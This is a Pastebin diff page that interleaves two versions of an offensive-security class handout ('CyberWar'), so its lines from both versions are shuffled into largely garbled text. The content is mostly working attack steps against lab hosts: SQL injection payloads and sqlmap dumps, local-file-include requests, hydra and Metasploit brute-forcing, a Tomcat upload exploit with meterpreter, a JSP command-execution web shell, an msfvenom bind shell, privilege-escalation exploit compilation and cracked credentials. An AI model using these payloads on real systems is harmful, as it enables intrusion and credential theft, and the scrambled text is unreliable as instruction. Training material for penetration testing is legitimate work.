View difference between Paste ID: <a href="/KnCnbr5x">KnCnbr5x</a> and <a href="/0whrVjzA">0whrVjzA</a> - Pastebin.com

View difference between Paste ID: KnCnbr5x and 0whrVjzA

SHOW: | | - or go back to the newest paste.

########################################################
# CyberWar: Advanced Offensive Cyber Operations        #
# By Joe McCray of Strategic Security                  #
########################################################



#########################
# Class Virtual Machine #
#########################
 
 
Here is the VMWare virtual machine for the class:
Here is the VMWare virtual machine for the class or you can use Kali Linux as well if you like:
 
https://s3.amazonaws.com/infosecaddictsvirtualmachines/InfoSecAddictsVM.zip
https://s3.amazonaws.com/infosecaddictsvirtualmachines/Ubuntu-17-10-InfoSecAddictsVM.zip
user:      infosecaddicts
pass:      infosecaddicts


Let's have you connect to the VPN. I wanted to make sure that I did some of the stuff on my local virtual machines because I want you to do the hunting for vulnerable hosts to attack.
If I attack the live targets in the lab then I'll end up giving away a lot of the little secrets that I want you to discover.


To connect to the VPN open a web browser on your host machine (not your virtual machine) and go to the following URL:
https://54.245.178.32/?src=connect

So, let's start with some lab fun (just a little bit)...lol. Here are the instructions for connecting to the VPN:

https://s3.amazonaws.com/infosecaddictsfiles/Strategic-Security-2017-VPN-Info.pdf
Accept the security exception and enter one of the following user names:
vpn username: {first_initial.last_name}  example: j.mccray

vpn password: !@#$vpn4321VPN
username: labuser001		
username: labuser002
username: labuser003
username: labuser004
If you wants some scanning tips you should take a look at the following document:
username: labuser005
https://s3.amazonaws.com/infosecaddictsfiles/LabNetworkScanningV4.pdf
username: labuser006
username: labuser007
username: labuser008
username: labuser009
username: labuser010
username: labuser011
######################### 
username: labuser012
username: labuser013
username: labuser014
username: labuser015
username: labuser016
username: labuser017
username: labuser018
username: labuser019
username: labuser020

----------------------------------------------------------------------------------------------------------------------------------------

Mr. McCray will provide you with the password for the usernames above once the training session starts.




The target network range is:
172.31.2.0/24
#######################

# Scanning Techniques #

#######################
You can do any attack EXCEPT man-in-the-middle attacks, and please DO NOT attack any other IP ranges.
sudo nmap -sL 172.31.2.0/24





wget --no-check-certificate https://raw.githubusercontent.com/BenDrysdale/ipcrawl/master/ipcrawl.c


gcc ipcrawl.c -o ipcrawl


chmod 777 ipcrawl

----------------------------------------------------------------------------------------------------------------------------------------
./ipcrawl 172.31.2.1 172.31.2.254
Some tools to install:
---------------------------Type This-----------------------------------
wget --no-check-certificate https://dl.packetstormsecurity.net/UNIX/scanners/propecia.c
gcc propecia.c -o propecia
sudo cp propecia /bin
-----------------------------------------------------------------------





propecia 172.31.6 22
Step 1: Portscan the server
---------------------------Type This-----------------------------------
propecia 172.31.6 80
sudo nmap -sS 172.31.2.139
-----------------------------------------------------------------------
propecia 172.31.6 443

Step 2: Version scan the server
propecia 172.31.6 3389
---------------------------Type This-----------------------------------
sudo nmap -sV -p22,80 172.31.2.139
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | grep open
-----------------------------------------------------------------------

nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2 " " $3}'


nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' | wc -l
Step 3: Vulnerability scan the webserver
---------------------------Type This-----------------------------------
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}'

 
nmap -Pn -sV -T 5 -oG - -p 21,22,80,443,1433,3389 172.31.2.* | awk '/open/{print $2}' > ~/labnet-ip-list.txt

 
cat ~/labnet-ip-list.txt

 
#################################################

# Screenshotting the Web Servers in the Network #

#################################################
perl nikto.pl -h 172.31.2.139
-----------------------------------------------------------------------
mkdir labscreenshots

cd labscreenshots/



wget https://s3.amazonaws.com/infosecaddictsfiles/wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
Step 4: Directory brute-force the webserver
tar xf wkhtmltox-0.12.4_linux-generic-amd64.tar.xz
---------------------------Type This-----------------------------------
cd wkhtmltox/bin/

sudo cp wkhtmltoimage /usr/local/bin/wkhtmltoimage-i386

git clone https://github.com/v0re/dirb.git
 
cd dirb/
git clone git://github.com/SpiderLabs/Nmap-Tools.git

cd Nmap-Tools/NSE/
./configure
 
sudo cp http-screenshot.nse /usr/share/nmap/scripts/
make
 
dirb
sudo nmap --script-updatedb

./dirb http://172.31.2.139 wordlists/big.txt
-----------------------------------------------------------------------

cd ~/toolz/labscreenshots/

sudo nmap -Pn -T 5 -p 80 -A --script=http-screenshot 172.31.2.0/24 -iL /home/infosecaddicts/labnet-ip-list.txt






vi screenshots.sh


#!/bin/bash

printf "<HTML><BODY><BR>" > labnet-port-80-screenshots.html

ls -1 *.png | awk -F : '{ print $1":"$2"\n<BR><IMG SRC=\""$1"%3A"$2"\" width=400><BR><BR>"}' >> labnet-port-80-screenshots.html

printf "</BODY></HTML>" >> labnet-port-80-screenshots.html
----------------------------------------------------------------------------------------------------------------------------------------------





sh screenshots.sh

Attack steps:
-------------
python -m SimpleHTTPServer

 
Step 1: Ping sweep the target network
--- Now browse to the IP of your Linux machine on port 8000 (http://192.168.200.157:8000/labnet-port-80-screenshots.html):
-------------------------------------
http://Ubuntu-VM-IP:8000/labnet-port-80-screenshots.html

 
---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------
##########################

# Nmap NSE tricks to try #
Found 4 hosts:
##########################
172.31.2.47
sudo nmap -Pn -n --open -p21 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.0/24
172.31.2.47
172.31.2.157
172.31.2.217
sudo nmap -Pn -n --open -p22 --script=sshv1,ssh2-enum-algos 172.31.2.0/24


Step 2: Port scan target system
sudo nmap -Pn -n -sU --open -p53 --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer 172.31.2.0/24

 
 
sudo nmap -Pn -n --open -p111 --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo 172.31.2.0/24
---------------------------Type This-----------------------------------
sudo nmap -sV 172.31.2.47
-----------------------------------------------------------------------
sudo nmap -Pn -n --open -p445 --script=msrpc-enum,smb-enum-domains,smb-enum-groups,smb-enum-processes,smb-enum-sessions,smb-enum-shares,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-server-stats,smb-system-info,smbv2-enabled,stuxnet-detect 172.31.2.0/24



sudo nmap -Pn -n --open -p1433 --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info 172.31.2.0/24
PORT    STATE    SERVICE VERSION
22/tcp  open     ssh     OpenSSH 5.9p1 Debian 5ubuntu1.4 (Ubuntu Linux; protocol 2.0)
80/tcp  open     http    Apache httpd 2.2.22 ((Ubuntu))
sudo nmap -Pn -n --open -p1521 --script=oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt 172.31.2.0/24
514/tcp filtered shell
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

sudo nmap -Pn -n --open -p3306 --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables 172.31.2.0/24


Step 3: Vulnerability Scan the webserver
sudo nmap -Pn -n --open -p3389 --script=rdp-vuln-ms12-020,rdp-enum-encryption 172.31.2.0/24
----------------------------------------
 
 
sudo nmap -Pn -n --open -p5900 --script=realvnc-auth-bypass,vnc-info 172.31.2.0/24
---------------------------Type This-----------------------------------
cd ~/toolz/
 
sudo nmap -Pn -n --open -p6000-6005 --script=x11-access 172.31.2.0/24

 
git clone https://github.com/sullo/nikto.git Nikto2
sudo nmap -Pn -n --open -p27017 --script=mongodb-databases,mongodb-info 172.31.2.0/24

cd Nikto2/program
 
perl nikto.pl -h 172.31.2.47
sudo nmap -sV -oA nse --script-args=unsafe=1 --script-args=unsafe  --script "auth,brute,discovery,exploit,external,fuzzer,intrusive,malware,safe,version,vuln and not(http-slowloris or http-brute or http-enum or http-form-fuzzer)" 172.31.2.0/24
-----------------------------------------------------------------------
 
 
Step 4: Run dirbuster or similar directory bruteforce tool against the target
-----------------------------------------------------------------------------
 
 
---------------------------Type This-----------------------------------
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl
 
perl Webr00t.pl -h 172.31.2.47 -v | grep -v "404 Not Found"
-----------------------------------------------------------------------
Take screenshots of you performing all of the tasks above



#####################################
Step 5: Browse the web site to look for clues
# Writing Your Own Nmap NSE Scripts #
---------------------------------------------
#####################################
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself


----------------------------------------------------------------------
http://172.31.2.47/test
sudo vi /usr/share/nmap/scripts/intro-nse.nse
http://172.31.2.47/test.php (got the following error message)
	'file' parameter is empty. Please provide file path in 'file' parameter
-- The Head Section --

-- The Rule Section --
Figured this was a Local File Include (LFI) so I tried:
portrule = function(host, port)
	http://172.31.2.47/test.php?file=/etc/passwd
    return port.protocol == "tcp"
	http://172.31.2.47/test.php?file=/etc/passwd%00
            and port.number == 80

            and port.state == "open"
None of these worked so I tried it as a POST request with curl (reference: https://pastebin.com/yfBz5H7b)
end
---------------------------Type This-----------------------------------
curl -X POST -F 'file=/etc/passwd' http://172.31.2.47/test.php
-- The Action Section --
-----------------------------------------------------------------------
action = function(host, port)

    return "CyberWar!"

end

----------------------------------------------------------------------
http://172.31.2.47/a
http://172.31.2.47/b
- Ok, now that we've made that change let's run the script
http://172.31.2.47/c  (a and b gave 404 errors, but "c" is a blank page, and view source is blank as well - this must be a config file"
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443

So let's try that POST request with curl to pull down the c.php config file.

---------------------------Type This-----------------------------------
curl -X POST -F 'file=/var/www/html/c.php' http://172.31.2.47/test.php
curl -X POST -F 'file=/var/htdocs/c.php' http://172.31.2.47/test.php 
curl -X POST -F 'file=/var/www/c.php' http://172.31.2.47/test.php
----------------------------------------------------------------------
----------------------------------------------------------------------- 
sudo vi /usr/share/nmap/scripts/intro-nse.nse

<?php
-- The Head Section --
#header( 'Z-Powered-By:its chutiyapa xD' );
local shortport = require "shortport"
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
-- The Rule Section --
header( 'X-Powered-By:testing only' );
portrule = shortport.http

ini_set( 'session.cookie_httponly', 1 );

-- The Action Section --

action = function(host, port)

    return "CyberWar!"
// Check connection
end
if (mysqli_connect_errno())
----------------------------------------------------------------------
  {
  echo "connection failed ->  " . mysqli_connect_error();
- Ok, now that we've made that change let's run the script
  }
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse infosecaddicts.com -p 22,80,443

?>



---------------------------Type This-----------------------------------
ssh -l billu 172.31.2.47
	b0x_billu
OK, now let's have some fun with my buddy Carlos Perez's website which you should have been looking at quite a lot if you were trying to get Ruby 2.1.5 working last year.
-----------------------------------------------------------------------

----------------------------------------------------------------------

sudo vi /usr/share/nmap/scripts/intro-nse.nse

http://172.31.2.47/phpmyadmin
-- The Head Section --
http://172.31.2.47/phpMyAdmin
local shortport = require "shortport"
http://172.31.2.47/pma
local http = require "http"
http://172.31.2.47/phpmy

-- The Rule Section --

portrule = shortport.http
Then I Googled config file name for phpmyadmin (config.inc.php)

-- The Action Section --
---------------------------Type This-----------------------------------
action = function(host, port)
curl -X POST -F 'file=/var/www/phpmy/config.inc.php' http://172.31.2.47/test.php
-----------------------------------------------------------------------
    local uri = "/installing-metasploit-in-ubunt/"
<?php
    local response = http.get(host, port, uri)

    return response.status
/* Servers configuration */
$i = 0;
end

----------------------------------------------------------------------
/* Server: localhost [1] */
$i++;
- Ok, now that we've made that change let's run the script
$cfg['Servers'][$i]['verbose'] = 'localhost';
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
----------------------------------------------------------------------
$cfg['Servers'][$i]['auth_type'] = 'cookie';
sudo vi /usr/share/nmap/scripts/intro-nse.nse

$cfg['Servers'][$i]['password'] = 'roottoor';
-- The Head Section --
$cfg['Servers'][$i]['AllowNoPassword'] = true;
local shortport = require "shortport"

local http = require "http"

---------------------------Type This-----------------------------------
-- The Rule Section --
ssh -l root 172.31.2.47
portrule = shortport.http
	roottoor
-----------------------------------------------------------------------
-- The Action Section --

action = function(host, port)


    local uri = "/installing-metasploit-in-ubunt/"

    local response = http.get(host, port, uri)


    if ( response.status == 200 ) then
---------------------------------------------------------------------------------------------------------------------------------------------------------
        return response.body

    end
Attack steps:
-------------
end

----------------------------------------------------------------------


- Ok, now that we've made that change let's run the script
Step 1: Ping sweep the target network
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
-------------------------------------


---------------------------Type This-----------------------------------
nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------



- Found 3 hosts
----------------------------------------------------------------------
172.31.2.64
sudo vi /usr/share/nmap/scripts/intro-nse.nse
172.31.2.217
172.31.2.238
-- The Head Section --

local shortport = require "shortport"

local http = require "http"

local string = require "string"
Step 2: Port scan target system
-------------------------------
-- The Rule Section --

portrule = shortport.http

---------------------------Type This-----------------------------------
-- The Action Section --
nmap -sV 172.31.2.64
action = function(host, port)
-----------------------------------------------------------------------

    local uri = "/installing-metasploit-in-ubunt/"

    local response = http.get(host, port, uri)

-------------Scan Results--------------------------------------------
    if ( response.status == 200 ) then
PORT     STATE    SERVICE VERSION
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
22/tcp   open     ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.6 (Ubuntu Linux; protocol 2.0)
        return title
80/tcp   open     http    Apache httpd 2.4.7 ((Ubuntu))
    end
514/tcp  filtered shell
1037/tcp filtered ams
end
6667/tcp open     irc     ngircd
----------------------------------------------------------------------
Service Info: Host: irc.example.net; OS: Linux; CPE: cpe:/o:linux:linux_kernel
--------------------------------------------------------------------
- Ok, now that we've made that change let's run the script

sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443

Step 3: Vulnerability Scan the webserver
----------------------------------------


---------------------------Type This-----------------------------------
cd ~/toolz/
 
----------------------------------------------------------------------

sudo vi /usr/share/nmap/scripts/intro-nse.nse

git clone https://github.com/sullo/nikto.git Nikto2
-- The Head Section --

local shortport = require "shortport"

local http = require "http"

local string = require "string"
perl nikto.pl -h 172.31.2.64
-----------------------------------------------------------------------
-- The Rule Section --

portrule = shortport.http

Step 4: Run dirbuster or similar directory bruteforce tool against the target
-- The Action Section --
-----------------------------------------------------------------------------
action = function(host, port)


    local uri = "/installing-metasploit-in-ubunt/"
---------------------------Type This-----------------------------------
    local response = http.get(host, port, uri)
wget https://dl.packetstormsecurity.net/UNIX/cgi-scanners/Webr00t.pl

    if ( response.status == 200 ) then
perl Webr00t.pl -h 172.31.2.64 -v
        local title = string.match(response.body, "Installing Metasploit in Ubuntu and Debian")
-----------------------------------------------------------------------

        if (title) then

            return "Vulnerable"

        else
Step 5: Browse the web site to look for clues
            return "Not Vulnerable"
---------------------------------------------
        end
Since no glaring vulnerabilities were found with the scanner - we start just looking around the website itself
    end

end

..... really didn't get much from here so we just opened the web page in a browser
----------------------------------------------------------------------
http://172.31.2.64/

- Ok, now that we've made that change let's run the script
.....browsed to the webpage and saw that it pointed to:
sudo nmap --script=/usr/share/nmap/scripts/intro-nse.nse darkoperator.com -p 22,80,443
http://172.31.2.64/jabc

....clicked on documentation link and found hidden text that pointed to here:
http://172.31.2.64/jabcd0cs/

# Day 2 Homework #
....saw that the app was OpenDocMan v1.2.7 and found it was vulnerable:
https://www.exploit-db.com/exploits/32075/
Take screenshots of you performing all of the day 2 tasks above

Tried the sql injection described in exploit-db:
http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,version(),3,4,5,6,7,8,9

http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user UNION SELECT 1,user(),3,4,5,6,7,8,9



Tried to run sqlmap against the target


---------------------------Type This-----------------------------------
cd sqlmap-dev/
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -b --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-user --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --current-db --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --dbs --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" --users --passwords --dbms=mysql
-----------------------------------------------------------------------



FOUND: cracked password 'toor' for user 'drupal7' (sqlmap)
FOUND: 9CFBBC772F3F6C106020035386DA5BBBF1249A11 hash is 'toor' verified at crackstation.net



---------------------------Type This-----------------------------------
python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs --tables --dbms=mysql

python sqlmap.py -u "http://172.31.2.64/jabcd0cs/ajax_udf.php?q=1&add_value=odm_user" -D jabcd0cs -T odm_user --dump --dbms=mysql
-----------------------------------------------------------------------

	username: 	webmin
	hash:		b78aae356709f8c31118ea613980954b

https://hashkiller.co.uk/md5-decrypter.aspx
	
use auxiliary/scanner/http/http_version			
	hash:		b78aae356709f8c31118ea613980954b
	pass:		webmin1980


ok - /phpmyadmin and /webmin both did not work in the browser but these credentials worked for SSH.



---------------------------Type This-----------------------------------
ssh -l webmin 172.31.2.64
	webmin1980
use auxiliary/scanner/http/tomcat_enum			 

id

cat /etc/*release
-----------------------------------------------------------------------



....tired of not having a real command shell...


---------------------------Type This-----------------------------------
python -c 'import pty;pty.spawn("/bin/bash")'


cd /tmp
 
pwd
 
use auxiliary/scanner/http/http_version			

cat >> exploit.c << out
 
**************paste in the content from here *****************
https://www.exploit-db.com/raw/39166/
 
 
------ hit enter a few times ------
 
------ then type 'out' ----- this closes the file handle...
 

use auxiliary/scanner/http/tomcat_mgr_login			 

---------------------------Type This----------------------------------- 
gcc -o boom exploit.c
 
./boom
-----------------------------------------------------------------------


------------exploit failed, damn let's try another one ---------



---------------------------Type This-----------------------------------
cat >> exploit2.c << out
 
**************paste in the content from here *****************
https://www.exploit-db.com/raw/37292/


out


gcc -o boom2 exploit2.c
 
./boom2

id


......YEAH - do the happy dance!!!!

exploit 



---- Previous class attack process -------


#########################
# Building a quick list #
#########################

---------------------------Type This-----------------------------------

cd ~
echo bob >> list.txt
echo jim >> list.txt
echo joe >> list.txt
echo tim >> list.txt
echo admin >> list.txt
echo hello >> list.txt
echo rob >> list.txt
echo test >> list.txt
echo aaaaaa >> list.txt
echo larry >> list.txt
echo mario >> list.txt
echo jason >> list.txt
echo john >> list.txt
-----------------------------------------------------------------------


###########################################################
# Let's start with some basic scanning of the lab network #
###########################################################

---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ nmap -sP 172.31.2.0/24
-----------------------------------------------------------------------

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:17 EST
Nmap scan report for 172.31.2.24
Host is up (0.046s latency).
Nmap scan report for 172.31.2.47
Host is up (0.045s latency).
Nmap scan report for 172.31.2.64
Host is up (0.037s latency).
Nmap scan report for 172.31.2.86
Host is up (0.040s latency).
Nmap scan report for 172.31.2.117
Host is up (0.038s latency).
Nmap scan report for 172.31.2.139
Host is up (0.037s latency).
Nmap scan report for 172.31.2.157
Host is up (0.036s latency).
Nmap scan report for 172.31.2.217
Host is up (0.047s latency).
Nmap scan report for 172.31.2.238
Host is up (0.036s latency).
Nmap done: 256 IP addresses (9 hosts up) scanned in 3.22 seconds






---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ sudo nmap -sS 172.31.2.24
-----------------------------------------------------------------------

[sudo] password for infosecaddicts:

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:18 EST
Nmap scan report for 172.31.2.24
Host is up (1.8s latency).
Not shown: 989 closed ports
PORT     STATE    SERVICE
25/tcp   open     smtp
80/tcp   open     http
111/tcp  open     rpcbind
139/tcp  open     netbios-ssn
445/tcp  open     microsoft-ds
514/tcp  filtered shell
1322/tcp open     novation
2049/tcp open     nfs
8080/tcp open     http-proxy
8081/tcp open     blackice-icecap
9000/tcp open     cslistener

Nmap done: 1 IP address (1 host up) scanned in 133.56 seconds
Deploy the WAR file using the built-in deploy option on the manager web-page. 







---------------------------Type This-----------------------------------

infosecaddicts@ubuntu:~$ sudo nmap -sV -p25,80,111,139,445,1322,2049,8080,8081,9000 172.31.2.24
-----------------------------------------------------------------------

Starting Nmap 7.12 ( https://nmap.org ) at 2017-11-21 13:21 EST
Nmap scan report for 172.31.2.24
Host is up (0.031s latency).
PORT     STATE SERVICE     VERSION
25/tcp   open  ftp         vsftpd 3.0.2
80/tcp   open  http        Apache httpd 2.4.7 ((Ubuntu))
111/tcp  open  rpcbind     2-4 (RPC #100000)
139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: CANYOUPWNME)
1322/tcp open  ssh         OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
2049/tcp open  nfs_acl     2-3 (RPC #100227)
8080/tcp open  http        Apache Tomcat/Coyote JSP engine 1.1
8081/tcp open  http        Apache httpd 2.4.7 ((Ubuntu))
9000/tcp open  http        Jetty winstone-2.9
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.15 seconds








###########################
# Day 1: Attacking Kevgir #
###########################


******** Attacking Kevgir ********
I figured I've give you something fun to play with.
 
 
 
###############
# Using Nikto #
###############

---------------------------Type This-----------------------------------
 
cd ~/toolz/
use auxiliary/scanner/ssh/ssh_users			 

rm -rf nikto*
 
git clone https://github.com/sullo/nikto.git Nikto2
 
cd Nikto2/program
 
perl nikto.pl -h 172.31.2.24
 
perl nikto.pl -h 172.31.2.24:8080
 
perl nikto.pl -h 172.31.2.24:8081
 
perl nikto.pl -h 172.31.2.24:9000
 
-----------------------------------------------------------------------
use auxiliary/scanner/ssh/ssh_login			 

 
 
####################
# Using Metasploit #
####################

---------------------------Type This-----------------------------------

cd ~/toolz/metasploit
 
./msfconsole
 
use auxiliary/scanner/http/http_version        
 
set RHOSTS 172.31.2.24
 
set RPORT 8080
 
run
 
 
-------------------------------
 
use auxiliary/scanner/http/tomcat_enum           
 
set RHOSTS 172.31.2.24
 
set RPORT 8080
 
run
-----------------------------------------------------------------------
 
 
 
 
 
####################
# Attacking Tomcat #
####################

python pmabf.py http://172.31.2.24 root list.txt		(this gave me the WRONG password)
---------------------------Type This-----------------------------------

use auxiliary/scanner/http/http_version        
 
set RHOSTS 172.31.2.24
 
set RPORT 8080
 
run
 
 
------------------------------- 
 
 
use use auxiliary/scanner/http/joomla_plugins			 
use auxiliary/scanner/http/tomcat_mgr_login          
 
set USERNAME tomcat
 
set USERPASS_FILE /home/infosecaddicts/list.txt
 
set STOP_ON_SUCCESS true
 
set RHOSTS 172.31.2.24
 
set RPORT 8080
 
run
 
 
-------------------------------
 
use exploit/multi/http/tomcat_mgr_upload
 
set HttpUsername tomcat
 
set HttpPassword tomcat
 
set RHOST 172.31.2.24
 
set RPORT 8080
 
set PATH /manager/html
 
set PAYLOAD java/meterpreter/bind_tcp
 
exploit
 
 
run post/linux/gather/checkvm
 
run post/linux/gather/enum_configs
 
run post/linux/gather/enum_protections
 
run post/linux/gather/enum_system
 
run post/linux/gather/enum_users_history
 
run post/linux/gather/hashdump
 
shell
 
/bin/bash
 
id
 
uname -a
 
dpkg -l
 
cd /tmp
 
	infosecaddicts

 
 
	infosecaddicts

 
**************paste in the content from here *****************
https://raw.githubusercontent.com/offensive-security/exploit-database/master/platforms/linux/local/39166.c
 
 
------ hit enter a few times ------
 
------ then type 'out' ----- this closes the file handle...
 
 
gcc -o boom exploit.c
 
./boom
 
id
 
 
-----------------------------------------------------------------------
 
---------------------------Type This-----------------------------------
 
hydra -l tomcat -P /home/infosecaddicts/list.txt -e ns -s 8080 -vV 172.31.2.24 http-get /manager/html
-----------------------------------------------------------------------
 
 
 
 
 
-------------------------------------------index.jsp-------------------------------------------
<FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
   String cmd = request.getParameter("cmd");
   String output = "";
   if(cmd != null) {
      String s = null;
      try {
         Process p = Runtime.getRuntime().exec(cmd,null,null);
         BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream()));
         while((s = sI.readLine()) != null) { output += s+"</br>"; }
      }  catch(IOException e) {   e.printStackTrace();   }
   }
%>
<pre><%=output %></pre>
-------------------------------------------index.jsp-------------------------------------------
Target IP Address:

172.31.2.54

 
cd toolz/

mkdir dirbuster
---------------------------Type This-----------------------------------
wget "http://downloads.sourceforge.net/project/dirbuster/DirBuster%20%28jar%20%2B%20lists%29/1.0-RC1/DirBuster-1.0-RC1.tar.bz2?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fdirbuster%2Ffiles%2FDirBuster%2520%2528jar%2520%252B%2520lists%2529%2F1.0-RC1%2F&ts=1370262745&use_mirror=nchc" -O DirBuster-1.0-RC1.tar.bz2

tar -xjvf DirBuster-1.0-RC1.tar.bz2

mv DirBuster-1.0-RC1 dirbuster

rm DirBuster-1.0-RC1.tar.bz2

cd webshell
------------------------------------------------------------------------------------

-----------------------------------------------------------------------
open link in browser:

 
http://172.31.2.54/
Deploy the WAR file using the built-in deploy option on the manager web-page.
Once the WAR file is deployed I simply browse to the URL I deployed the WAR file
Running nikto and dirbuster with small.txt

 
 
infosecaddicts@ubuntu:~/toolz/nikto/program$ perl nikto.pl -host http://172.31.2.54/

****** This section isn't finished ******
infosecaddicts@ubuntu:~$ cd /home/infosecaddicts/Desktop/dirbuster/DirBuster-1.0-RC1

infosecaddicts@ubuntu:~/Desktop/dirbuster/DirBuster-1.0-RC1$ ./DirBuster-1.0-RC1.sh
 ---------------------------Type This-----------------------------------

target: http://172.31.2.54/

choose small.txt

./msfvenom -p linux/x86/shell_bind_tcp LPORT="7777" -f war > /home/infosecaddicts/bind7777.war
then try with normal txt

jar tf ~/bind7777.war
open
-----------------------------------------------------------------------
 
http://172.31.2.54/phpmy/

 
Google is your friend hahahahahahahah........
------

Burp

------

# Attacking FTP #
download Burp and run it


infosecaddicts@ubuntu:~/Downloads$ chmod +x burpsuite_free_linux_v1_7_24.sh
---------------------------Type This-----------------------------------
infosecaddicts@ubuntu:~/Downloads$ ./burpsuite_free_linux_v1_7_24.sh

sudo nmap -sV -Pn -p25 --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-vsftpd-backdoor 172.31.2.24
 
/test is vuln to LFI

 
hydra -l admin -P /home/infosecaddicts/list.txt -u -s 25 172.31.2.24 ftp
POST /test HTTP/1.1

ftp
Host: 172.31.2.54

admin
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0

pwd
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

 
Accept-Language: en-US,en;q=0.5

-----------------------------------------------------------------------
Cookie: PHPSESSID=9a0qsracd27ca5tq1t18kv5k16

 
Connection: close

# Attacking SSH #
Upgrade-Insecure-Requests: 1


---------------------------Type This-----------------------------------

sudo apt-get install -y libssh-dev
try file=/etc/passwd

cd ~/toolz/hydra
try file=test.php
make clean
./configure
try file=/var/www/phpmy/config.inc.php
make
sudo make install

 
hydra -L /home/infosecaddicts/list.txt -P /home/infosecaddicts/list.txt -u -s 1322 172.31.2.24 ssh
 
ssh root@172.31.2.54

 
pass: roottoor

------------------------------- 
return to burp

cd ~/toolz/metasploit
 
POST /test HTTP/1.1

 
Host: 172.31.2.54
use auxiliary/scanner/ssh/ssh_enumusers          
 
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0

 
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

 
Accept-Language: en-US,en;q=0.5

 
Cookie: PHPSESSID=9a0qsracd27ca5tq1t18kv5k16

 
Connection: close

 
Upgrade-Insecure-Requests: 1

 
try file=c.php

 
use auxiliary/scanner/ssh/ssh_login          
 
You can now login to phpmyadmin : http://172.31.2.54/phpmy/

 
user: billu

pass: b0x_billu

set STOP_ON_SUCCESS true
 
set RHOSTS 172.31.2.24
 
set RPORT 1322
# Day 3 Homework #

run
Take screenshots of you performing all of the day 3 tasks above

 
sessions -l
 
############################################################

# Section 1: Ruby Fundamentals and Metasploit Architecture #

############################################################

 
################################

# Chapter 1: Ruby Fundamentals #

################################
-----------------------------------------------------------------------
 
 
########################
- Ruby is a general-purpose, object-oriented programming language, which was created by Yukihiro Matsumoto, a computer

scientist and programmer from Japan. It is a cross-platform dynamic language.

****** This section isn't finished ******
- The major implementations of this language are Ruby MRI, JRuby, HotRuby, IronRuby, MacRuby, etc. Ruby

on Rails is a framework that is written in Ruby.
---------------------------Type This-----------------------------------
 
- Ruby's file name extensions are .rb and .rbw.

-----------------------------------------------------------------------
- official website of this

****** This section isn't finished ******
- language: www.ruby-lang.org.

